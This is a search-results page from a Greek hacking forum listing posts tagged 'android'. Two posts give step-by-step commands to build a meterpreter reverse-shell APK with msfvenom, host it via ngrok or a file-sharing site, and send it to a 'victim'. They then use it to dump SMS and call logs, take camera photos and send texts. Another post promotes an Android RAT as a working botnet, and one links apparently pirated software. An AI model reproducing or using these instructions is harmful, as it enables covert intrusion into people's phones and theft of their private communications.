Μετάβαση στο περιεχόμενο

Αναζήτηση στην κοινότητα

Εμφάνιση αποτελεσμάτων για τις ετικέτες 'android'.

  • Αναζήτηση με βάση τις ετικέτες

    Πληκτρολογήστε τις ετικέτες και χωρίστε τες με κόμμα.
  • Αναζήτηση με βάση τον συγγραφέα

Τύπος περιεχομένου


Ενότητες

  • GreekHacking
    • Κανόνες & Ανακοινώσεις
    • Καλωσόρισμα νέων μελών
    • Προτάσεις / Βελτιώσεις
    • Νέα σχετικά με το Hacking/Security
    • Ασφάλεια & Προστασία Δεδομένων
    • Εκτός Θέματος
  • Leaks
    • Hacking Tutorials
    • Anonymity & Privacy / Ανωνυμία και Προστασία Προσωπικών Δεδομένων
    • Προγράμματα για Hacking / Hacking Programs
    • Cracking Οδηγοί & Πληροφορίες
    • Βιβλία σχετικά με το Hacking
    • Προγράμματα - High Quality downloads
    • E-Books
    • XXX Movies

Categories

  • Ορολογίες
  • Hacking για αρχάριους
  • Hacking για προχωρημένους
  • Mobile Hacking
  • Cracking Tutorials
  • Hacking Computers
  • Hacking Tutorials στα Αγγλικά
  • Tutorials for hacks
  • Διάφοροι Οδηγοί
    • Οδηγοί σχετικά με τα Linux
    • Οδηγοί για υπολογιστές
    • Οδηγοί σχετικά με τα Mac
    • Οδηγοί για κινητά
  • Hacking Tutorials στα Αγγλικά Copy

Categories

  • Hacking
  • Ιστοσελίδες/Server
  • Hardware
  • Windows

Βρείτε αποτελέσματα...

Βρείτε αποτελέσματα που...


Ημερομηνία δημιουργίας

  • Start

    End


Τελευταία ενημέρωση

  • Start

    End


Φιλτράρισμα με βάση τον αριθμό των...

  1. Στην παρούσα μεταπτυχιακή διατριβή γίνεται μελέτη και αναλυτική περιγραφή της αρχιτεκτονικής και τεχνολογικής υποδομής του Metasploit Framework καθώς και έρευνα για τις αδυναμίες που υπάρχουν στο λειτουργικό σύστημα Android. Το Metasploit είναι ένα πρόγραμμα, όπου το περιβάλλον εργασίας του βασίζεται σε μια βάση δεδομένων που παρέχει πληροφορίες για ευπάθειες ασφαλείας και χρησιμοποιείται για δοκιμασίες διείσδυσης σε δίκτυα (penetration testing). Με το Metasploit μπορούμε να προσομοιώσουμε πραγματικές καταστάσεις με δίκτυα και επιθέσεις για να βρούμε τις αδυναμίες που υπάρχουν, πριν βρεθούν από κάποιον ανεπιθύμητο και κακόβουλο χρήστη. Χρησιμοποιούμε τεχνικές επιτιθέμενου για να παρακάμψουμε τις οποιεσδήποτε άμυνες διαθέτουμε στο σύστημα μας (πχ. Antivirus, firewall, IPS) ώστε να ανακαλύψουμε τα ‘’εύκολα’’ στοιχεία εισόδου λογαριασμών των χρηστών. Στη συνέχεια της διατριβής, θα μελετήσουμε κάποια θέματα σχετικά με το Android. Το Android είναι ένα λειτουργικό σύστημα για κινητές συσκευές που κατασκευάστηκε από την Google. Βασίζεται στην γλώσσα προγραμματισμού Java3, και στις μέρες μας είναι το πιο διαδεδομένο λειτουργικό σύστημα, καθώς καλύπτει το μεγαλύτερο μερίδιο της αγοράς. Οι κίνδυνοι που διατρέχουν οι χρήστες μιας Android συσκευής, μπορεί να διαφέρουν σε σχέση με αυτούς που καλούμαστε να αντιμετωπίσουμε ως χρήστες σταθερών υπολογιστών (desktop) ή laptop, ωστόσο είναι εξίσου σοβαροί και χρήζουν προσοχής για την αντιμετώπισή τους. Όπως και στους υπολογιστές, έτσι και στα Android, υπάρχουν ιοί. Λόγω του ότι το λειτουργικό Android είναι τόσο διαδεδομένο, τα κρούσματα επιθέσεων σε Android συσκευές, αυξάνονται ολοένα και περισσότερο, με αποτέλεσμα οι χρήστες να είναι μονίμως εκτεθειμένοι σε κακόβουλες επιθέσεις. Η διατριβή θα καταλήξει, με τη μελέτη κάποιων αδυναμιών που υπάρχουν στο Android, και με το πρόγραμμα Metasploit θα κάνουμε επίδειξη δυο (2) περιπτώσεων από κενά ασφαλείας που έχει το Android, οι οποίες μπορούν να εκμεταλλευθούν από κακόβουλους χρήστες (hackers), για να αποκτήσουν πρόσβαση σε συσκευές Android. Ανάλυση του πλαισίου δοκιμών διείσδυσης Metasploit Έρευνα στο λειτουργικό σύστημα Android - Ευθύμιος Κασιδάκης Msc. 2016.pdf Πηγή: Διώνη
  2. Πολλοί έχουν την περιέργια να μάθουν πως παραβιάζεται ένα κινητό, πως γίνεται να ανοίξουν την κάμερα μας και να μας βλέπουν, πως γίνεται να δουν την ακριβής τοποθεσία μας μέσα από το κινητό μας, και πολλά άλλα. Σε αυτό το Post λοιπόν θα μάθουμε πως γίνεται αυτό, αλλά πριν αρχίσουμε, να πω ότι η ασφάλεια πλέον έχει αναβαθμιστεί οπότε το antivirus τον προηδοποιεί τον χρήστη στον οποίο κάνετε την επίθεση ότι πρόκειται για κάποιου είδους Trojan (Δούριος ίππος). Επίσης να προσθέσω ότι το λειτουργικό σύστημα που θα χρησιμοποιηθεί γι αυτήν την επίθεση είναι Linux. Συγκεκριμένα το Kali. Θα χρησιμοποιήσουμε τα εξής: msfvenom, msfconsole, ngrok, apache, https://www.gofile.io Το ngrok είναι αυτό το οποίο θα μας βοηθήσει να έχουμε απομακρυσμένη πρόσβαση στην συσκευή του θύματος. Αν δεν θέλετε να κατεβάσετε το ngrok μπορείτε να κάνετε forward την port σας, φτιάχνοντας τις ρυθμίσεις εσωτερικά του ρούτερ σας. Πάμε λοιπόν να ανοίξουμε το ngrok, γράφοντας ./ngrok tcp 8080 στο terminal μας. Για αρχή, θα πρέπει να φτιάξουμε το λεγόμενο Payload. Δηλαδή τον "ιο" ο οποίος θα εισβάλει μέσα στην συσκευή του θύματος και θα μας δώσει τις απαραίτητες δυνατότητες για να μπορέσουμε να διαχειρηστούμε την συσκευή. Για να το φτιάξουμε αυτό θα χρειαστούμε το msfvenom. msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R> /var/www/html/greekhacking.apk Στο msfvenom γράφουμε τις παραπάνω εντολές. Θα χρησιμοποιήσουμε λοιπόν το android/meterpreter/reverse_tcp, LHOST θα βάλουμε το tcp που μας δίνει το ngrok και LPORT αυτό επίσης που μας δίνεται στο ngrok. Μετά θα γράψουμε R > /var/www/html/ για να βάλουμε το αρχείο στην θέση /var/www/html/ και θα δώσουμε όνομα στο αρχείο μας. (π.χ greekhacking.apk). Αφού το κάνουμε αυτό λοιπόν πατάμε enter και το αρχείο μας είναι έτοιμο. Μετά ανοίγουμε ένα άλλο Terminal και ξεκινάμε το service apache. Γράφουμε λοιπόν service apache2 start και για να τσεκάρουμε αν όντως λειτουργεί, γράφουμε την εντολή service apache2 status. Όταν το κάνουμε αυτό, ανοίγουμε ένα άλλο Terminal στο οποίο θα ξεκινήσουμε την επίθεση. το msfconsole Τώρα θα πάμε στο https://www.gofile.io για να ανεβάσουμε το αρχείο που φτιάξαμε πριν από το msfvenom. Όταν ανεβάσουμε το αρχείο, επιστρέφουμε στο msfconsole και γράφουμε την εντολή use multi/handler Μετά τα εξής: set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 8080 Το LPORT μπαίνει αναλόγως με το τι port είχαμε βάλει στο ngrok στην αρχή. Εγώ είχα γράψει ./ngrok tcp 8080. Εσείς μπορείτε να βάλετε 4444. Αφού τελειώσουμε και με αυτό, στέλνουμε το Link με το αρχείο που ανεβάσαμε πρίν για να το κατεβάσει το θύμα στην συσκευή του. Και γράφουμε στο Τερμιναλ exploit. Εδώ περιμένουμε να εγκαταστήσει το θύμα την εφαρμογή και να την ανοίξει. Όταν λοιπόν την ανοίξει θα μας δώσει πρόσβαση στην συσκευή του ανοίγοντας κάποια sessions. Αφού ανοίξει τα sessions, είμαστε έτοιμοι. Είμαστε μέσα στην συσκευή του θύματος και μπορούμε να εκτελέσουμε εντολές. Επειδή όμως δεν ξέρουμε τι εντολές μπορούμε να εκτελέσουμε, θα γράψουμε το command "help" έτσι ώστε να μας βγάλει μία ολόκληρη λίστα με τα απαραίτητα. Η ανάρτηση αυτή είναι καθαρά για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη για το πως θα το χρησιμοποιήσετε. Για οποιαδήποτε ερώτηση κάντε σχόλιο.
  3. Σε αυτό το άρθρο, θα μάθουμε πως να χακάρουμε μια συσκευή android και πως να την κάνουμε exploit όπως επιθυμούμε. Το android είναι ένα λειτουργικό σύστημα βασισμένο στον πυρήνα του Linux. Χρησιμοποιεί τύπο αρχείου APK για την εγκατάσταση εφαρμογών. Έτσι, το malware μας πρέπει να είναι επίσης σε APK. Για να το φτιάξουμε θα εκτελέσουμε την παρακάτω εντολή για msfvenom: [hide] msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apk Αφού φτιαχτεί το malware θα ξεκινήσουμε ένα handler για να πάρουμε session με την εντολή: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.1.109 set lport 1234 exploit Όταν τρέξει το exploit στείλε το αρχείο APK στο θύμα και σιγουρευτείτε πως θα το τρέξουν στο κινητό τους. Όταν το αρχείο αυτό τρέξει τότε θα πάρετε session όπως φαίνεται στην παρακάτω εικόνα: Τώρα, υπάρχουν πολλές εντολές για παραπάνω exploitation την συσκευή του χρήστη. Θα σας δείξουμε στην παρακάτω εικόνα μερικά από τα πιο πρακτικά. Μπορείτε να δείτε αν η συσκευή είναι rooted με την παρακάτω εντολή: check_root Μπορείτε επίσης να κάνετε dump όλα τα call-logs σε κάποιο αρχείο με την εντολή: dump_calllog Η οποία θα φτιάξει ένα αρχείο TXT με την λεπτομερές λίστα των call logs του θύματος. Εκτελέστε την παρακάτω εντολή για να την διαβάσετε: cat <όνομα_αρχείου_txt> Μπορείτε επίσης να στείλετε και όλων των ειδών SMS από την συσκευή με την εντολή: send_sms -d <αριθμός_παραλήπτη> -t <κείμενο> Μπορείτε να τραβήξετε φωτογραφία από την κάμερα με την εντολή: webcam_snap η οποία τα αποθηκεύση την φωτογραφία σε αρχείο JPEG Για να κάνετε dump τα SMS τρέξτε την εντολή: dump_sms Όπως και με τα call logs, μπορείτε να διαβάσετε το αρχείο με την εντολή cat (δείτε την εικόνα από κάτω:) Με αυτόν τον τρόπο μπορείτε να κάνετε exploit την συσκευή όπως θέλετε. [/hide]
  4. Γεια σας ειμαι καινουργιος σε αυτο το Forum. Οριστε ενα Repository στο GitHub που υπαρχει το Source Code για το BotNet απο Android το εχω δοκιμασει δουλευει μια χαρα. https://github.com/AhMyth/AhMyth-Android-RAT Πως να το κατεβασεται σε Linux: Πως να το Χρεισημοποιηται: Πιθανα Solutions για Προβληματα 1) Java version, Τρεξτε το απο κατω command και επιλεξτε το Java 8 αλλιως αν δεν το εχετε κατεβαστε το sudo update-alternatives --config java 2)Οτι αλλο προβλημα εχετε στηλτε μου DN
  5. Chapters Getting started with Android Android Studio Instant Run in Android Studio TextView AutoCompleteTextView Autosizing TextViews ListView Layouts ConstraintLayout TextInputLayout CoordinatorLayout and Behaviors TabLayout ViewPager CardView NavigationView RecyclerView RecyclerView Decorations RecyclerView onClickListeners RecyclerView and LayoutManagers Pagination in RecyclerView ImageView VideoView Optimized VideoView WebView SearchView BottomNavigationView Canvas drawing using SurfaceView Creating Custom Views Getting Calculated View Dimensions Adding a FuseView to an Android Project Supporting Screens With Different Resolutions, Sizes ViewFlipper Design Patterns Activity Activity Recognition Split Screen / Multi-Screen Activities Material Design Resources Data Binding Library SharedPreferences Intent Fragments Button Emulator Service The Manifest File Gradle for Android FileIO with Android FileProvider Storing Files in Internal & External Storage Zip file in android Unzip File in Android Camera and Gallery Camera 2 API Fingerprint API in android Bluetooth and Bluetooth LE API Runtime Permissions in API-23 + Android Places API Android NDK DayNight Theme (AppCompat v23.2 / API 14+) Glide Dialog Enhancing Alert Dialogs Animated AlertDialog Box GreenDAO Tools Attributes Formatting Strings SpannableString Notifications AlarmManager Handler BroadcastReceiver UI Lifecycle HttpURLConnection Callback URL Snackbar Widgets Toast Create Singleton Class for Toast Message Interfaces Animators Location Theme, Style, Attribute MediaPlayer Android Sound and Media MediaSession MediaStore Multidex and the Dex Method Limit Data Synchronization with Sync Adapter PorterDuff Mode Menu Picasso RoboGuice ACRA Parcelable Retrofit2 ButterKnife Volley Date and Time Pickers Localized Date/Time in Android Time Utils In-app Billing FloatingActionButton Touch Events Handling touch and motion events Detect Shake Event in Android Hardware Button Events/Intents (PTT, LWP, etc.) GreenRobot EventBus Otto Event Bus Vibration ContentProvider Dagger 2 Realm Android Versions Wi-Fi Connections SensorManager ProgressBar Custom Fonts Getting system font names and using the fonts Text to Speech(TTS) Spinner Data Encryption/Decryption OkHttp Handling Deep Links Crash Reporting Tools Check Internet Connectivity Creating your own libraries for Android applications Device Display Metrics Building Backwards Compatible Apps Loader ProGuard - Obfuscating and Shrinking your code Typedef Annotations: @IntDef, @StringDef Capturing Screenshots MVP Architecture Orientation Changes Xposed PackageManager Gesture Detection Doze Mode Colors Keyboard RenderScript Fresco Swipe to Refresh Creating Splash screen IntentService Implicit Intents Publish to Play Store Universal Image Loader Image Compression 9-Patch Images Email Validation Bottom Sheets EditText Speech to Text Conversion Installing apps with ADB Count Down Timer Barcode and QR code reading Android PayPal Gateway Integration Drawables TransitionDrawable Vector Drawables VectorDrawable and AnimatedVectorDrawable Port Mapping using Cling library in Android Creating Overlay (always-on-top) Windows ExoPlayer XMPP register login and chat simple example Android Authenticator AudioManager AudioTrack Job Scheduling Accounts and AccountManager Integrate OpenCV into Android Studio MVVM (Architecture) ORMLite in android Retrofit2 with RxJava ShortcutManager LruCache Jenkins CI setup for Android Projects fastlane Define step value (increment) for custom RangeSeekBar Getting started with OpenGL ES 2.0+ Check Data Connection Java on Android Android Java Native Interface (JNI) Notification Channel Android O Robolectric Moshi Strict Mode Policy : A tool to catch the bug in the Compile Time. Internationalization and localization (I18N and L10N) Fast way to setup Retrolambda on an android project. How to use SparseArray Shared Element Transitions Android Things Library Dagger 2: Dependency Injection in Applications JCodec Formatting phone numbers with pattern. Paint What is ProGuard? What is use in Android? Create Android Custom ROMs Genymotion for android ConstraintSet CleverTap Publish a library to Maven Repositories adb shell Ping ICMP AIDL Android game development Android programming with Kotlin Android-x86 in VirtualBox Leakcanary Okio Bluetooth Low Energy Looper Annotation Processor SyncAdapter with periodically do sync of data Fastjson JSON in Android with org.json Gson Android Architecture Components Jackson Smartcard Security How to store passwords securely Secure SharedPreferences Secure SharedPreferences SQLite Accessing SQLite databases using the ContentValues class Firebase Firebase Cloud Messaging Firebase Realtime DataBase Firebase App Indexing Firebase Crash Reporting Twitter APIs Youtube-API Integrate Google Sign In Google signin integration on android Google Awareness APIs Google Maps API v2 for Android Google Drive API Displaying Google Ads AdMob Google Play Store Sign your Android App for Release TensorFlow Android Vk Sdk Project SDK versions Facebook SDK for Android Thread AsyncTask Testing UI with Espresso Writing UI tests - Android Unit testing in Android with JUnit Inter-app UI testing with UIAutomator Lint Warnings Performance Optimization Android Kernel Optimization Memory Leaks Enhancing Android Performance Using Icon Fonts Bitmap Cache Loading Bitmaps Effectively Exceptions Logging and using Logcat ADB (Android Debug Bridge) Localization with resources in Android Convert vietnamese string to english string Android AndroidNotesForProfessionals.pdf
  6. 7thShare Android Data Recovery 2.3.8.8 Το # 1 λογισμικό αποκατάστασης στοιχείων Android στον κόσμο για την ανάκτηση των διαγραμμένων φωτογραφιών, βίντεο, επαφών, μηνυμάτων, αρχείων καταγραφής κλήσεων και άλλων από συσκευές Android και κάρτες SD. • Ανάκτηση φωτογραφιών / SMS / Επαφές / Βίντεο / Audios / Έγγραφα και πολλά άλλα στη συσκευή σας Android. • Υποστήριξη της Samsung, HTC, LG, Sony, Motorola και άλλων 500+ τηλεφώνων Android, tablet και εξωτερικής κάρτας SD. • Βελτιώστε τη σάρωση και προεπισκόπηση & ανάκτηση τυχόν διαγραμμένων αρχείων από το Android. • Να ανακτήσετε δυνατά, γρήγορα και αποτελεσματικά τα διαγραμμένα δεδομένα από συσκευές Android Άμεση ανάκτηση φωτογραφιών, βίντεο, επαφών, μηνυμάτων, αρχείων καταγραφής κλπ. Από συσκευές Android και κάρτες SD Δεν έχει σημασία τι συνέβη στις συσκευές σας Android, όπως ριζωμένες, διαγραφή ατυχημάτων, κατεστραμμένα, σπασμένα, επαναφορά εργοστασιακής επαναφοράς ή σπασμένα κλπ. Αυτή η καλύτερη ανάκτηση δεδομένων για το Android έχει τη δυνατότητα ανάκτησης διαγραμμένων αρχείων από το Android. Μπορεί να σας βοηθήσει να ανακτήσετε οποιαδήποτε δεδομένα από το τηλέφωνο Android με λίγα κλικ. Λειτουργεί καλά για την ανάκτηση επαφών, μηνυμάτων, αρχείων καταγραφής κλήσεων, συνημμένων μηνυμάτων, γκαλερί, φωτογραφιών, βίντεο, ηχητικών προγραμμάτων και άλλων εγγράφων σε τηλεφωνικά τηλέφωνα Android / tablet ή εξωτερική κάρτα SD. Compatible with various Android Devices and SD Card The professional Android Data Recovery Software can recover deleted and lost files for most popular Android brands, such as Samsung Galaxy s5/s6/note 5, HTC M8/M7, LG, Sony, Motorola, Google phone, ZET, Huawei and more Android phone and tablets. Υποστηριζόμενα λειτουργικά συστήματα Android: Android 2.0 και νεότερες εκδόσεις (συμπεριλαμβανομένου του Android 6.0 Marshmallow) είναι πλήρως συμβατές. Εσωτερική κάρτα μνήμης SD: Τα αρχεία που διαγράφονται ή εξαφανίζονται από την εσωτερική μνήμη και την κάρτα SD μπορούν να αποκατασταθούν ελεύθερα από τη συσκευή Android. Format: EXE Μέγεθος zip: 24.0 MB Date Of Release: 26-3-2018 [hide] > http://coolbytez.com/owcmsrk3u87y [/hide] [hide] > http://www.easybytez.com/s3sldp291nrd [/hide]

ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...